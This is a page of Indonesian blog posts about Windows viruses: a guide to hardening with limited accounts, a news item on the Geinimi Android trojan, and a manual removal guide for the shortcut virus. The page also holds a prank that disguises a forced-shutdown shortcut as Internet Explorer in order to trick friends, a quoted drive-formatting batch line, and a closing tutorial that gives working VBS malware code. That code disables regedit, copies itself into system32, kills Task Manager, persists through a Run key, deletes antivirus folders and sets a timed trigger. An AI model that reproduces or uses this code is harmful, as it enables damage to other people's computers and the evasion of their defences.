Membuat PC Kebal Virus Tanpa Anti Virus

Dari pada tidak ada kerjaan lebih baik  saya buat posting ini, mungkin postingnya udah  banyak di blog - blog yang lain dan suda menjadi rahasia umum tapi apa salahnya saya buat lagi siapa tau posting kali ini berguna bagi pungunjung 

BEING ARCHITECT ^_^

kali ini postingnya mengenai PC yang kebal terhadap virus tanpa menggunakan anti virus, ini semua dikarnakan PC punyaku sering di serang trojan hehehehe.....

OK tanpa basa basi lagi Mari kita lihat caranya:

Ok dengan teknik 'OS Hardening' sederhana anda bisa buat komputer anda kebal virus tanpa menggunakan program anti virus (AV cuma bikin komputer jadi bolot!!!)

Semua trojan yang ada di Indonesia belum ada yang bisa menembus teknik ini. Teknik ini merupakan teknik sederhana yang asik. Dalam banyak kasus, lu cukup logout kalau compie lu terinfeksi trojan dan compie akan bersih dengan sendirinya begitu lu login kembali.

Gak pakai Deep Freeze ...^_^
Dalam beberapa kasus, kadang beberapa langkah pembersihan tambahan mungkin diperlukan.

pada dasarnya semua anti virus akan membuat komputer jadi berat karena program AV yang baik harus memiliki database semua pattern malcode jahat yang ada di seluruh dunia. Kecuali nanti mereka merubah pendekatan program mereka ke AI or 'kecerdasan buatan'.

Biasakan bekerja menggunakan account dengan privilege 'limited' bro. Karena sebenarnya account 'administrator' sesuai namanya ditujukan microsoft hanya untuk meng-admin sistem seperti melakukan instalasi program.
Jadi kalau sekedar bekerja dengan world, excel, ppoint, dsb kita sebaiknya menggunakan account 'limited' saja.

gimana cara kerjanya....???

ok begini cara kerjanya.....

"OS hardening" diciptakan berdasarkan pola serangan kebanyakan trojan komputer di Indonesia kemudian melakukan perkuatan registry dan folder2 penting.

Malcode seperti virus & trojan pada dasarnya hanya program biasa, mereka akan melakukan modifikasi pada key2 di dalam registry ketika di eksekusi.

Pertanyaan seperti bagaimana caranya supaya 'malcode' tidak dapat menginfeksi kompie kita adalah serupa dengan pertanyaan bagaimana agar malcode tidak dapat melakukan melakukan perubahan registry yang berarti juga sama dengan dengan pertanyaan bagaimana supaya suatu program tidak dapat di 'install'.... yupp install program di bawah user 'limited'^_^

User dengan privilege limited account tidak pernah diijinkan sistem untuk melakukan instalasi program bahkan melakukan upaya pemformatan drive seperti salah satu baris perintah yang terdapat pada malcode harddisk killer:

for %%a in (%drive%) do call format %%a:/q /u /autotest >nul

Key utama yang selalu menjadi sasaran malcode adalah HKEY_LOCAL_MACHINE. HKEY_LOCAL_MACHINE berisi konfigurasi sistem yang berlaku untuk semua user. Malcode tidak akan diijinkan melakukan modifikasi HKEY_LOCAL_MACHINE bila status privilege anda adalah 'limited', hanya key HKEY_CURRENT_USER yang berisi kondigurasi user tertentu yang dapat di 'hajar'(baca=diinfeksi).

Memperbaiki HKEY_CURRENT_USER yang dirusak malcode sangat mudah, cukup hapus account yang bersangkutan (ingat dengan opsi 'keep files') dan buat kembali account yang sama. Sistem operasi akan kembali menyusun database HKEY_CURRENT_USER untuk user yang bersangkutan ... tidak sampai 5 menit!!. Ini yang gw bilang pada forumer similikity bahwa tidak ada trojan yg dapat bertahan di kompie gw lebih dari 5'^_^

Mari buktikan. Coba buat 1 account user 'limited' buka aplikasi notepad or apa aja untuk buat file apa aja. Simpan file tersebut dengan nama yg mudah kita ingat kemudian hapus account tersebut menggunakan account Administrator (ingat opsi 'keep files').
Setelah di hapus coba lihat di desktop, akan muncul 1 folder yg berisi file yang baru saja kita buat.

Buat kembali account yang tadi kita hapus menggunakan dengan privilege 'limited' tentu saja setelah itu logout.
Coba login dengan user baru tersebut. Ketika kita login pertama kali menggunakan user baru tersebut terasa sistem agak lama mengijinkan kita masuk, hal ini disebabkan karena OS sedang menuliskan HKEY_CURRENT_USER yang baru buat kita, dan tentu saja bebas virus (kalau tidak ada kode virus yang telah terlebih dahulu bercokol di didalam HKEY_LOCAL_MACHINE tentunya ^_^)

See?? betapa mudahnya membasmi trojan komputer tanpa menggunakan 1 pun program anti virus??

It's work 100%... 

Berikut ini tutorialnya :

langkah pertama...masuk ke control panel trus klik user account

Langka keduanya

  

Langkah ketiganya.

Jangan lupa buat limited !

Kalo udah kena virus cara ini yang harus dilakukan.....
 

Langkah keempat : Log off kemudian masuk sebagai Administrator....and ikuti pic dibawah ini

Klik Delete Account, nah pasti kalian akan bertanya.....kalo accountnya didelete gimana nasib file2 yang ada disitu????

Tenang ... Archcom  akan bantu..!
Gini caranya 

Langkah kelima :

kemudian pilih Keep Files

pasti kalian baka tanya lagi....
kalo file nya di keep....cara bukanya gimana? tenang gini cara bukanya.....

buka local disk dimana kamu simpan windows, contohnya

BEING ARCHITECT ^_^

 simpen windows om di local disk C:/

jadi

BEING ARCHITECT ^_^

harus buka local disk C, lalu buka folder document and setting trus buka folder all user, naah folder account kamu ada disitu....

OK selamat mencoba dan semoga bermanfaat

Read More

Membuat Virus Palsu Pada Komputer

hahaha... ngomong-ngmong masala virus komputer saya punya cara yang dapat membuat virus palsu pada komputer anda ni.. tapi jangan anggap remeh ni virus soalnya kalo tidak tahu menghentikan prosesnya bisa-bisa aktivitas pada komputer anda bisa terganggu loh..!!!

Nah mari kita lihat cara membuatnya, simpel aja ko.!

caranya :
1. Klik kanan pada Desktop ? New ? Shortcut
2. Pada kolom, ketikkan shutdown –s –t 300 –c “Virus Activated”
3. Klik Next ? ketikkan nama file yang kamu inginkan (Misal. Internet Explorer)
4. Klik kanan pada file untuk Properties dan klik Change Icon ? Icon Internet Explorer untuk mengelabui orang membukanya.
5. Virus palsu kamu sukses dibuat.
6. Sekarang, kirimkan virus palsumu kepada teman-temanmu. Ketika dibuka, file tersebut tidak dapat menghilang walaupun menggunakan Task Manager.
7. Untuk menghilangkannya, hanya ada 1 cara. Hanya dengan klik tombol Start kemudian klik Run.
8. Pada kolom tersebut, ketikkan shutdown –a.
9. Virus palsu tersebut berhasil dihapus.


Catatan : artikel ini hanya digunakan sebatas pengetahuan saja, jika anda sala memanfaatkannya maka resiko tanggung sendiri..
selamat mencoba

Read More

Virus Computer Terganas Yang Menyerang Sistem Operasi Android

Virus Computer Terbaru Tahun 2011

Salah satu virus komputer yang menyerang telepon genggam yang menggunakan sistem operasi Android Google telah muncul di China, sehingga dapat memungkinkan peretas memperoleh akses ke data pribadi. Satu laporan pekan ini dari Lookout Mobile Security menyatakan virus terbaru Trojan tersebut yang menyerang perangkat Android telah dijuluki “Geinimi” dan “dapat menghimpun sangat banyak data pribadi di telepon pengguna serta mengirimnya ke server terpencil”.  Perusahaan itu menyebut virus tersebut “malware Android yang paling canggih yang telah kita saksikan setakat ini”.

 

“Segera setelah perangkat jahat tersebut terpasang di telepon pengguna, malware itu memiliki kemampuan untuk menerima komando dari server terpencil yang memungkinkan pemilik server itu untuk mengendalikan telefon tersebut,” kata Lookout.

“Pencipta Geinimi telah menaikkan batas kecanggihan secara mencolok sehingga mengatasi malware Android yang sebelumnya diawasi dengan mengoperasikan berbagai teknik untuk membuat kabur semua kegiatannya,” katanya. Motif di balik virus tersebut tidak jelas, kata Lookout, yang menambahkan bahwa itu dapat digunakan untuk apa saja mulai dari “jaringan iklan jahat sampai upaya untuk menciptakan botnet Android”.

Namun perusahaan itu menyatakan pengguna yang tampaknya paling mungkin terserang adalah mereka yang mengunduh applikasi Android dari China. Applikasi yang terinfeksi meliputi versi kemasan-ulang yang dijual di China dari Monkey Jump 2, Sex Positions, President vs Aliens, City Defense dan Baseball Superstars 2010.

“Penting untuk mengingatkan bahwa sekalipun ada contoh pertandingan yang dikemas-ulang dengan Trojan tersebut, versi asli yang tersedia di laman resmi Google Android Market belum terserang,” kata perusahaan keamanan itu.

Read More

Cara Membasmi Virus Shortcut Secara Manual

Salah satu virus akhir-akhir ini cukup merepotkan yaitu yang sering disebut dengan virus shortcut, virus ini tidak merusak file, tetapi hanya menyembunyikan file asli kemudian membuat shortcut baru bagi file kita sehingga apabila diklik shortcut buatan virus maka file/folder tersebut tidak akan terbuka karena memang itu bukanlah shortcut asli. saya juga sebagai korban dari virus shorcut itu, jadi mendingan saya lanjutin posting ini biar teman2 lain bisa baca dan virusnya bisa di hilangkan. 

Setelah saya mencoba mencari solusi bagaimana cara menghilangkan virus shortcut dengan bantuan paman google sanya menemukan beberapa blog dan web yang menyediakan artikel cara menghilangkan/membersihkan virus shortcut, antara lainnya yang cukup efisien menurut saya seperti berikut :

Cara Membasminya :

1. Matikan system restore computer kita terlebih dahulu caranya klik kanan pada icon My Computer, properties, klik tab System Restore kemudian berikan tanda centang pada Turn Off System Restore on All Drives dan klik OK

2. Matikan proses dari file Wscript yang terletak di C:\Windows\System32, dengan cara menggunakan tools seperti CProcess, HijackThis atau dapat juga menggunakan Task Manager dari Windows.

3. Setelah dimatikan proses dari Wscript tersebut, kita harus men-delete atau me-rename dari file tersebut agar tidak digunakan untuk sementara oleh virus tersebut

Sebagai catatan, kalau kita me-rename dari file Wscript.exe tersebut dengan otomatis, maka akan dicopykan lagi di folder tersebut. Oleh sebab itu, kita harus mencari di mana file Wscript.exe yang lainnya, biasanya ada di C:\Windows\$NtServicePackUninstall$, C:\Windows\ServicePackFiles\i386.

Tidak seperti virus-virus VBS lainnya, kita bisa mengganti Open With dari file VBS menjadi Notepad, virus ini berextensi MDB yang berarti adalah file Microsoft Access. Jadi Wscript akan menjalankan file DATABASE.MDB seolah-olah dia adalah file VBS

4. Delete file induknya yang ada di C:\Documents and Settings\\My Documents\database.mdb, agar setiap kali komputer dijalankan tidak akan me-load file tersebut. Dan jangan lupa kita buka juga MSCONFIG, disable perintah yang menjalankannya.

5. Sekarang kita akan men-delete file-file Autorun.INF. Microsoft.INF dan Thumb.db. Caranya, klik tombol START, ketik CMD, pindah ke drive yang akan dibersihkan, misalnya drive C:\, maka yang harus kita lakukan adalah:

Ketik C:\del Microsoft.inf /s, perintah ini akan men-delete semua file microsoft.inf di seluruh folder di drive C:. Sementara kalau mau pindah drive tinggal diganti nama drivenya saja contoh: D:\del Microsoft.inf /s.

Untuk file autorun.inf, ketik C:\del autorun.inf /s /ah /f, perintah akan men-delete file autorun.inf (syntax /ah /f) digunakan karena file tersebut memakai attrib RSHA, begitu juga untuk file Thumb.db lakukan juga hal yang sama

6. Untuk men-delete file-file selain 4 file terdahulu, kita harus mencarinya dengan cara search file dengan ekstensi .lnk ukurannya 1 kb. Pada 'More advanced options' pastikan option 'Search system folders' dan 'Search hidden files and folders' keduanya telah dicentang.

"Harap berhati-hati, tidak semua file shortcut / file LNK yang berukuran 1 kb adalah virus, kita dapat membedakannya dari ikon, size dan tipenya. Untuk shortcut yang diciptakan virus ikonnya selalu menggunakan icon 'folder', berukuran 1 kb dan bertipe 'shortcut'. Sedangkan folder yang benar harusnya tidak memiliki 'size' dan tipenya adalah 'File Folder'. "

7. Fix registry yang sudah diubah oleh virus. Untuk mempercepat proses perbaikan registry salin script dibawah ini pada program 'notepad' kemudian simpan dengan nama 'Repair.inf'. Jalankan file tersebut dengan cara:

Klik kanan repair.inf
Klik Install
[Version]
Signature="$Chicago$"
Provider=Vaksincom Oyee

[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del

[UnhookRegKey]
HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe "%1""
HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*"
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, "Explorer.exe"
HKLM, SYSTEM\ControlSet001\Control\SafeBoot, AlternateShell,0, "cmd.exe"
HKLM, SYSTEM\ControlSet002\Control\SafeBoot, AlternateShell,0, "cmd.exe"

[del]
HKLM,SOFTWARE\Microsoft\Windows\CurrentVersion\Run, Winupdate
HKCU,SOFTWARE\Microsoft\Windows\CurrentVersion\Run, explorer

(^_^) semoga berhasil...!

Read More

Cara Cepat Membuat Sebuah Virus

-->
Sebelumnya, berikut ini cara-cara paling gampang untuk membuat virus.
semua hal dibawah ini hanya sebagai penambah pengetahuan kita saja
dan tidak boleh disalah gunakan untuk hal-hal yang bersifat merusak.
Dan saya tidak bertanggung jawab jika itu terjadi. Sekarang kita akan
membahas cara gampang membuat virus pake vbs file.

pertama, berikut ini hal-hal yang wajib kita siapin sebelum membuat virus.
# seperangkat komputer berikut monitor,cpu,mouse,kibor, dll (wajib)
# kita harus menyiapkan sebuah file yang ber-ekstensi vbs (*.vbs)
# secangkir teh anget.
# akan lebih afdoL kalo ditemenin lagu2nya rhcp (aku ngefans ma rhcp)

Untuk eksekusi pertama, yang dilakukan virus biasanya mengubah registry.
Sebenarnya udah aku bahas di blogku ini. tapi nggak papa aku ulangin aja.
biar keliatan resmi :-). misalnya:

1. mendisable regedit. Yang kita tulis:
On Error Resume Next(perintah ini digunakan pada file vb
supaya kalo ada yang salah bisa dilanjutin kode selanjutnya)
CreateObject("WScript.Shell").run "cmd.exe /c reg add hkcusoftware\microsoft\windows\currentversion\policies\system /v
disableregistrytools /t reg_dword /d ""1"" /f", vbhide

sebenarnya banyak cara untuk mendisable regedit. misalnya kek gini:
CreateObject("WScript.Shell").regwriteHKEY_CURRENT_USERsoftware\microsoft\windows\currentversion\policies\systemdisableregistrytools", 1, "REG_DWORD"
lalu mengubah registry yang lain. yang nggak aku bahas disini karena
udah pernah aku bahas pada postingan yang lain di blogku ini.
2. mengopikan diri ke direktory lain

CreateObject("Scripting.FileSystemObject").
GetFile(WScript.ScriptFullName).Copy "c:\windows\system32\virus.vbs"
Ada juga cara lain dengan kide seperti ini:
On Error Resume Next
createobject("scripting.filesystemobject").copyfile wscript.scriptfullname,
createobject("scripting.filesystemobject")
.getspecialfolder(1) & "\virus.vbs"
misalnya untuk mengkopikan diri ke direktory C:\WINDOWS\System32
dengan nama virus.vbs
.getspecialfolder(0) digunakan untuk direktory WINDOWS
.getspecialfolder(1) digunakan untuk direktory SYSTEM32 pada windowsXP
.getspecialfolder(2) digunakan untuk direktory Temporary

3.Membunuh proses.
digunakan untuk membunuh proses
(proses adalah program yang sedang berjalan)
misalnya kita akan membunuh proses taskmanager
On Error Resume Next
CreateObject("WScript.Shell")
.run "taskkill /f /im taskmgr.exe", vbhide

4.Menjalankan virus pada saat startup atau saat windows dihidupkan.
menggunakan regedit
On Error Resume Next
CreateObject("WScript.Shell").RegWrite "HKEY_LOCAL_MACHINESoftware\Microsoft\Windows\CurrentVersion\Run\virus"
, "c:\windows\system32\virus.vbs"
(menjalankan virus yang berada di direktory c:\windows\system32
dengan nama virus.vbs)

5.Menghapus File / Folder
agar virus yang kita buat tidak banyak menggunakan script bisa di singkat seperti ini:
On Error Resume Next
set hapus = CreateObject("Scripting.FileSystemObject")
hapus.DeleteFile "C:\xxx.exe" '(menghapus file xxx.exe di direktory C:\)
hapus.DeleteFolder "C:\antivirus" '(menghapus folder antivirus di direktory C:\)
6.Merestart Windows
CreateObject("WScript.Shell").run "shutdown -r -f -t 60", vbhide
merestart windows dalam waktu 60 sekon

7.Meng-ShutDown Windows
CreateObject("WScript.Shell").run "shutdown -s-f -t 60", vbhide
mematikan windows dalam waktu 60 sekon :)yang beda cuman
"shutdown -s-f -t 60"
S = untuk shutdown dan
R = untuk reboot\restart

8. Mengaktifkan Virus Pada Waktu tertentu
If day(now) = 1 and month(now) = 1 and year(now) = 2007 then
'(masukkan kode virus disini)
End if
'misalnya kalo mau mengaktifkan pada tanggal 1, bulan 1
'dan tahun 2007

OK.. Selamat mencoba.! Tapi ingat artikel ini hanya dipergunakan untuk menamba pengetahuan saja, bukan untuk kejahatan.

Read More